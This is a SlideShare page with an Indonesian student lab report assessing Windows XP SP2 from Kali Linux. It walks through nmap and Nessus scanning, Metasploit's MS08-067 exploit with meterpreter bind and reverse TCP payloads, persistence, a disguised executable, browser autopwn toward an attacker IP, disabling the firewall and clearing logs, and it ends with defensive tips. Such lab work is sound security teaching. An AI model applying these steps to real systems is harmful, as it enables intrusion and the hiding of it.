SlideShare ist ein Scribd-Unternehmen logo
1 von 17
Downloaden Sie, um offline zu lesen
Windows XP – Service Pack 2
Security Assessment
Tim :
1. Abdurrohman [11412033]
2. Rudin Alkrison [11412020]
3. Muchamad Taufiq [11412004]
4. Seto Juli Utomo [11412024]
5. Shandy Ismail [11412028]
STMIK WIDURI – TEKNIK INFORMATIKA
1. Install & Configuring Kalilinux (on VMWARE / Virtual Box)
2. Information Gathering
a. Host Scanning
fping -a -g 192.168.88.1 192.168.88.254 > host.txt
b. Port Scanning
nmap -iL host.txt –sS
c. Vulnerability Scanning
- Start nessus service
- Membuka nessus dari browser dengan alamat, https://localhost:8834
- Membuat policy profile , dapat memilih menggunakan scanner yang akan digunakan
- Pilih New Scan dan gunakan policy yang telah dibuat sebelumnya, masukkan juga host yang
akan di scan
- Hasil scan terlihat seperti gambar dibawah , di klik untuk detail
- Setelah dicek detail, dilihat target machine tersebut memiliki hole/vulnerability di port
mana
- Dapat terlihat bahwa ada vulnerability yang memungkinkan penyerang untuk
mengeksekusi kode pada port yang bermasalah
3. OS Based Vulnerability Assessment
- Untuk melakukan exploit kami menggunakan metasploit
- Pada console / terminal kita ketikkan msfconsole
- Berdasarkan hasil vulnerability dari nesus, dapat dicari di metasploit dengan kode ms08-
067
- Gunakan ms08_067_netapi
- Dan gunakan payload (payload di metasploit adalah opsi cara exploit melakukan control
target machine) windows/meterpreter/bind_tcp
- Ketik show options untuk melihat parameter yang akan digunakan
- Setelah semua sesuai jalankan command ‘exploit’
- Setelah masuk melalui meterpreter(adalah extensible payload yang dinamik dan
mudah dalam pengelolannya), coba masujkkan beberapa command seperti getuid,
upload, download dll.
4. Maintaining Access
- Maintain akses diperlukan sebagai langkah, jika suatu saat target machine di firewall
- Untuk maintain akses dapat dilakukan dengan menggunakan meterpreter – run persistence,
dimana akan membuat target menjalankan suatu servicea setiap dia restart.
- Meterpreter – run persistence (set on boot)
- Jalankan multi/handler untuk membuat listening port dimana yang melakukan inisiasi
adalah target machine, bukan attacker machine sehingga firewall pun tidak akan melakukan
tindakan apapun.
- Yang kedua dapat menggunakan cara reserve TCP, pada dasarnya sama saja dengan
persistence pada meterpreter hanya saja menggunakan payload yang berbeda yaitu
menggunakan windows/shell/reverse_tcp
- Setelah ‘.exe’ nya entah bagaimana cara nya agar file tersebut bisa di ambil dan dijalankan
oleh target, bisa dengan menyamarkan file tersebut dll.
5. Client Side Exploitation => Memanfaatkan celah yang dimiliki oleh user / pengguna, disaat
pengguna tersebut ceroboh dengan membuka file sembarangan yang mengakibatkan adanya
hole/vulnerability pada machine
a. Binary Payloads
ii. Sama seperti reverse tcp
b. Browser Autopwn
- Untuk browser autopwn , yaitu memanfaatkan kelemahan pada Browser yang
mengakibatkan target machine melakukan connect back atau reverse pada machine
attacker melalui browser
Running IE > Open attacker_IP
6. Other Task
a. Disable Firewall
b. Clear Log
7. Report
NO TASK RESULT
1 Information Gathering
Scanning Host
Scanning Port
Scanning Vulnerabilty
2 OS Assessment
Exploit Target Machine
3 Maintain Access
Connect Back – persistence
Connect Back – reverse tcp
4 Client Side Attacking
Binnary Payload
Browser Autopwn
5 Other Task
Disable Firewall
Clear Log
8. Role
NO TASK PIC
1 Information Gathering
Scanning Host Rudin
Scanning Port Seto
Scanning Vulnerabilty Shandy
2 OS Assessment
Exploit Target Machine Taufiq
3 Maintain Access
Connect Back – persistence Taufiq
Connect Back – reverse tcp Taufiq
4 Client Side Attacking
Binnary Payload Taufiq
Browser Autopwn Taufiq
5 Other Task
Disable Firewall Taufiq
Clear Log Taufiq
9. Preventive & Summary
c. Preventive
i. Rutin update dan patch OS dan AntiVirus
ii. Lebih bagus menggunakan Aplikasi firewall terpisah (3rd
party)
iii. Tidak sembarang membuka file (cek extension nya, dll)
iv. Menjadi user yang cerdas
d. Summary
v. Attacker dapat menyerang OS / Aplikasi dikarenakan ada nya hole security /
vulnerability
vi. Selain memanfaatkan OS/ Aplikasi yang vulnerable, juga memanfaatkan
kelemahan user sehingga menyebabkan OS/aplikasi tersebut menjadi
vulnerable

Weitere ähnliche Inhalte

Andere mochten auch

Iman kepada Nabi dan Rasul Allah SWT
Iman kepada Nabi dan Rasul Allah SWTIman kepada Nabi dan Rasul Allah SWT
Iman kepada Nabi dan Rasul Allah SWTMuhamad Prasetyo
 
Instalasi dan Konfigurasi Active Directory di Windows Server 2008
Instalasi dan Konfigurasi Active Directory di Windows Server 2008Instalasi dan Konfigurasi Active Directory di Windows Server 2008
Instalasi dan Konfigurasi Active Directory di Windows Server 2008Muhamad Prasetyo
 
RAN (Regional Area Network)
RAN (Regional Area Network)RAN (Regional Area Network)
RAN (Regional Area Network)Muhamad Prasetyo
 
Langkah - Langkah Instalasi Windows XP
Langkah - Langkah Instalasi Windows XPLangkah - Langkah Instalasi Windows XP
Langkah - Langkah Instalasi Windows XPMuhamad Prasetyo
 
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008Instalasi dan Konfigurasi DHCP Server di Windows Server 2008
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008Muhamad Prasetyo
 
SAN (Storage Area Network)
SAN (Storage Area Network)SAN (Storage Area Network)
SAN (Storage Area Network)Muhamad Prasetyo
 
Instalasi CentOS 6.4 Pada VMWare Workstation 10
Instalasi CentOS 6.4 Pada VMWare Workstation 10Instalasi CentOS 6.4 Pada VMWare Workstation 10
Instalasi CentOS 6.4 Pada VMWare Workstation 10I Putu Hariyadi
 
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...I Putu Hariyadi
 
How to group policy windows 2008 r2
How to   group policy windows 2008 r2How to   group policy windows 2008 r2
How to group policy windows 2008 r2Optima Mijatovic
 
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014I Putu Hariyadi
 
Solusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
Solusi Tugas Studi Kasus IPTables Three-Legged Network FirewallSolusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
Solusi Tugas Studi Kasus IPTables Three-Legged Network FirewallI Putu Hariyadi
 
Konfigurasi Routing OSPF Di MikroTik
Konfigurasi Routing OSPF Di MikroTikKonfigurasi Routing OSPF Di MikroTik
Konfigurasi Routing OSPF Di MikroTikI Putu Hariyadi
 
Konfigurasi Routing Statik di MikroTik
Konfigurasi Routing Statik di MikroTikKonfigurasi Routing Statik di MikroTik
Konfigurasi Routing Statik di MikroTikI Putu Hariyadi
 

Andere mochten auch (20)

Iman kepada Nabi dan Rasul Allah SWT
Iman kepada Nabi dan Rasul Allah SWTIman kepada Nabi dan Rasul Allah SWT
Iman kepada Nabi dan Rasul Allah SWT
 
KWU (Bubur Kertas)
KWU (Bubur Kertas)KWU (Bubur Kertas)
KWU (Bubur Kertas)
 
Instalasi dan Konfigurasi Active Directory di Windows Server 2008
Instalasi dan Konfigurasi Active Directory di Windows Server 2008Instalasi dan Konfigurasi Active Directory di Windows Server 2008
Instalasi dan Konfigurasi Active Directory di Windows Server 2008
 
RAN (Regional Area Network)
RAN (Regional Area Network)RAN (Regional Area Network)
RAN (Regional Area Network)
 
Dcn tester
Dcn testerDcn tester
Dcn tester
 
Langkah - Langkah Instalasi Windows XP
Langkah - Langkah Instalasi Windows XPLangkah - Langkah Instalasi Windows XP
Langkah - Langkah Instalasi Windows XP
 
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008Instalasi dan Konfigurasi DHCP Server di Windows Server 2008
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008
 
SAN (Storage Area Network)
SAN (Storage Area Network)SAN (Storage Area Network)
SAN (Storage Area Network)
 
Instalasi CentOS 6.4 Pada VMWare Workstation 10
Instalasi CentOS 6.4 Pada VMWare Workstation 10Instalasi CentOS 6.4 Pada VMWare Workstation 10
Instalasi CentOS 6.4 Pada VMWare Workstation 10
 
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...
 
How to group policy windows 2008 r2
How to   group policy windows 2008 r2How to   group policy windows 2008 r2
How to group policy windows 2008 r2
 
Rapidly deploying software
Rapidly deploying softwareRapidly deploying software
Rapidly deploying software
 
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014
 
HTML Form
HTML FormHTML Form
HTML Form
 
Solusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
Solusi Tugas Studi Kasus IPTables Three-Legged Network FirewallSolusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
Solusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
 
Konfigurasi Routing OSPF Di MikroTik
Konfigurasi Routing OSPF Di MikroTikKonfigurasi Routing OSPF Di MikroTik
Konfigurasi Routing OSPF Di MikroTik
 
From VB Script to PowerShell
From VB Script to PowerShellFrom VB Script to PowerShell
From VB Script to PowerShell
 
Vdi in-a-box
Vdi in-a-boxVdi in-a-box
Vdi in-a-box
 
Windows Server 2008
Windows Server 2008Windows Server 2008
Windows Server 2008
 
Konfigurasi Routing Statik di MikroTik
Konfigurasi Routing Statik di MikroTikKonfigurasi Routing Statik di MikroTik
Konfigurasi Routing Statik di MikroTik
 

Ähnlich wie WSP2SecAs

Mikrotik firewall chain input & firewall logging
Mikrotik firewall chain input & firewall loggingMikrotik firewall chain input & firewall logging
Mikrotik firewall chain input & firewall loggingsyahrulfadillah16
 
Sentralisasi Hotspot Mikrotik Berbasis EoIP over PPTP
Sentralisasi Hotspot Mikrotik Berbasis EoIP over PPTPSentralisasi Hotspot Mikrotik Berbasis EoIP over PPTP
Sentralisasi Hotspot Mikrotik Berbasis EoIP over PPTPI Putu Hariyadi
 
Pertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasiPertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasiRoziq Bahtiar
 
Laporan Tugas Akhir Simulasi Monitoring Sistem dengan Munin
Laporan Tugas Akhir Simulasi Monitoring Sistem dengan MuninLaporan Tugas Akhir Simulasi Monitoring Sistem dengan Munin
Laporan Tugas Akhir Simulasi Monitoring Sistem dengan MuninFiqry Mustafa
 
Praktikum orkom if 21 virtualisasi dan cc m9
Praktikum orkom if 21 virtualisasi dan cc m9Praktikum orkom if 21 virtualisasi dan cc m9
Praktikum orkom if 21 virtualisasi dan cc m9Ridenzu
 
Lebih dalam dengan Telnet dan SSH
Lebih dalam dengan Telnet dan SSHLebih dalam dengan Telnet dan SSH
Lebih dalam dengan Telnet dan SSHramasatriaf
 
Pertemuan05 firewall
Pertemuan05 firewallPertemuan05 firewall
Pertemuan05 firewallRoziq Bahtiar
 
MikroTik RouterOS Security Automation With Ansible
MikroTik RouterOS Security Automation With AnsibleMikroTik RouterOS Security Automation With Ansible
MikroTik RouterOS Security Automation With AnsibleI Putu Hariyadi
 
CARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEM
CARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEMCARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEM
CARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEMMunir Putra
 
Laporan 6
Laporan 6Laporan 6
Laporan 6hudakds
 
Membangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSSMembangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSSPT. Trinity Auto
 

Ähnlich wie WSP2SecAs (20)

Jurnal metasploit(revisi)
Jurnal metasploit(revisi)Jurnal metasploit(revisi)
Jurnal metasploit(revisi)
 
Mikrotik firewall chain input & firewall logging
Mikrotik firewall chain input & firewall loggingMikrotik firewall chain input & firewall logging
Mikrotik firewall chain input & firewall logging
 
Firewall Mikrotik
Firewall MikrotikFirewall Mikrotik
Firewall Mikrotik
 
Lapres 4 dan 5 1235010002
Lapres 4 dan 5   1235010002Lapres 4 dan 5   1235010002
Lapres 4 dan 5 1235010002
 
Sentralisasi Hotspot Mikrotik Berbasis EoIP over PPTP
Sentralisasi Hotspot Mikrotik Berbasis EoIP over PPTPSentralisasi Hotspot Mikrotik Berbasis EoIP over PPTP
Sentralisasi Hotspot Mikrotik Berbasis EoIP over PPTP
 
Pertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasiPertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasi
 
Laporan Tugas Akhir Simulasi Monitoring Sistem dengan Munin
Laporan Tugas Akhir Simulasi Monitoring Sistem dengan MuninLaporan Tugas Akhir Simulasi Monitoring Sistem dengan Munin
Laporan Tugas Akhir Simulasi Monitoring Sistem dengan Munin
 
Praktikum orkom if 21 virtualisasi dan cc m9
Praktikum orkom if 21 virtualisasi dan cc m9Praktikum orkom if 21 virtualisasi dan cc m9
Praktikum orkom if 21 virtualisasi dan cc m9
 
Lebih dalam dengan Telnet dan SSH
Lebih dalam dengan Telnet dan SSHLebih dalam dengan Telnet dan SSH
Lebih dalam dengan Telnet dan SSH
 
Pertemuan05 firewall
Pertemuan05 firewallPertemuan05 firewall
Pertemuan05 firewall
 
LAB SHEET COA.pptx
LAB SHEET  COA.pptxLAB SHEET  COA.pptx
LAB SHEET COA.pptx
 
Open vpn project
Open vpn projectOpen vpn project
Open vpn project
 
Makalah persentasi
Makalah persentasiMakalah persentasi
Makalah persentasi
 
MikroTik RouterOS Security Automation With Ansible
MikroTik RouterOS Security Automation With AnsibleMikroTik RouterOS Security Automation With Ansible
MikroTik RouterOS Security Automation With Ansible
 
kisi2 keamananjarkom
kisi2 keamananjarkomkisi2 keamananjarkom
kisi2 keamananjarkom
 
Modul 8 squid
Modul 8 squidModul 8 squid
Modul 8 squid
 
CARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEM
CARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEMCARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEM
CARA MEMBUAT HOST BASED INTRUSSION DETECTION SYSTEM
 
Laporan 6
Laporan 6Laporan 6
Laporan 6
 
Membangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSSMembangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSS
 
Firewall
FirewallFirewall
Firewall
 

WSP2SecAs

  • 1. Windows XP – Service Pack 2 Security Assessment Tim : 1. Abdurrohman [11412033] 2. Rudin Alkrison [11412020] 3. Muchamad Taufiq [11412004] 4. Seto Juli Utomo [11412024] 5. Shandy Ismail [11412028] STMIK WIDURI – TEKNIK INFORMATIKA
  • 2. 1. Install & Configuring Kalilinux (on VMWARE / Virtual Box) 2. Information Gathering a. Host Scanning fping -a -g 192.168.88.1 192.168.88.254 > host.txt b. Port Scanning nmap -iL host.txt –sS c. Vulnerability Scanning - Start nessus service
  • 3. - Membuka nessus dari browser dengan alamat, https://localhost:8834 - Membuat policy profile , dapat memilih menggunakan scanner yang akan digunakan
  • 4. - Pilih New Scan dan gunakan policy yang telah dibuat sebelumnya, masukkan juga host yang akan di scan - Hasil scan terlihat seperti gambar dibawah , di klik untuk detail
  • 5. - Setelah dicek detail, dilihat target machine tersebut memiliki hole/vulnerability di port mana - Dapat terlihat bahwa ada vulnerability yang memungkinkan penyerang untuk mengeksekusi kode pada port yang bermasalah
  • 6. 3. OS Based Vulnerability Assessment - Untuk melakukan exploit kami menggunakan metasploit - Pada console / terminal kita ketikkan msfconsole - Berdasarkan hasil vulnerability dari nesus, dapat dicari di metasploit dengan kode ms08- 067
  • 7. - Gunakan ms08_067_netapi - Dan gunakan payload (payload di metasploit adalah opsi cara exploit melakukan control target machine) windows/meterpreter/bind_tcp - Ketik show options untuk melihat parameter yang akan digunakan
  • 8. - Setelah semua sesuai jalankan command ‘exploit’
  • 9. - Setelah masuk melalui meterpreter(adalah extensible payload yang dinamik dan mudah dalam pengelolannya), coba masujkkan beberapa command seperti getuid, upload, download dll. 4. Maintaining Access - Maintain akses diperlukan sebagai langkah, jika suatu saat target machine di firewall - Untuk maintain akses dapat dilakukan dengan menggunakan meterpreter – run persistence, dimana akan membuat target menjalankan suatu servicea setiap dia restart. - Meterpreter – run persistence (set on boot)
  • 10. - Jalankan multi/handler untuk membuat listening port dimana yang melakukan inisiasi adalah target machine, bukan attacker machine sehingga firewall pun tidak akan melakukan tindakan apapun.
  • 11. - Yang kedua dapat menggunakan cara reserve TCP, pada dasarnya sama saja dengan persistence pada meterpreter hanya saja menggunakan payload yang berbeda yaitu menggunakan windows/shell/reverse_tcp
  • 12. - Setelah ‘.exe’ nya entah bagaimana cara nya agar file tersebut bisa di ambil dan dijalankan oleh target, bisa dengan menyamarkan file tersebut dll. 5. Client Side Exploitation => Memanfaatkan celah yang dimiliki oleh user / pengguna, disaat pengguna tersebut ceroboh dengan membuka file sembarangan yang mengakibatkan adanya hole/vulnerability pada machine a. Binary Payloads ii. Sama seperti reverse tcp b. Browser Autopwn - Untuk browser autopwn , yaitu memanfaatkan kelemahan pada Browser yang mengakibatkan target machine melakukan connect back atau reverse pada machine attacker melalui browser
  • 13. Running IE > Open attacker_IP
  • 14. 6. Other Task a. Disable Firewall
  • 16. 7. Report NO TASK RESULT 1 Information Gathering Scanning Host Scanning Port Scanning Vulnerabilty 2 OS Assessment Exploit Target Machine 3 Maintain Access Connect Back – persistence Connect Back – reverse tcp 4 Client Side Attacking Binnary Payload Browser Autopwn 5 Other Task Disable Firewall Clear Log 8. Role NO TASK PIC 1 Information Gathering Scanning Host Rudin Scanning Port Seto Scanning Vulnerabilty Shandy 2 OS Assessment Exploit Target Machine Taufiq 3 Maintain Access Connect Back – persistence Taufiq Connect Back – reverse tcp Taufiq 4 Client Side Attacking Binnary Payload Taufiq Browser Autopwn Taufiq 5 Other Task Disable Firewall Taufiq Clear Log Taufiq
  • 17. 9. Preventive & Summary c. Preventive i. Rutin update dan patch OS dan AntiVirus ii. Lebih bagus menggunakan Aplikasi firewall terpisah (3rd party) iii. Tidak sembarang membuka file (cek extension nya, dll) iv. Menjadi user yang cerdas d. Summary v. Attacker dapat menyerang OS / Aplikasi dikarenakan ada nya hole security / vulnerability vi. Selain memanfaatkan OS/ Aplikasi yang vulnerable, juga memanfaatkan kelemahan user sehingga menyebabkan OS/aplikasi tersebut menjadi vulnerable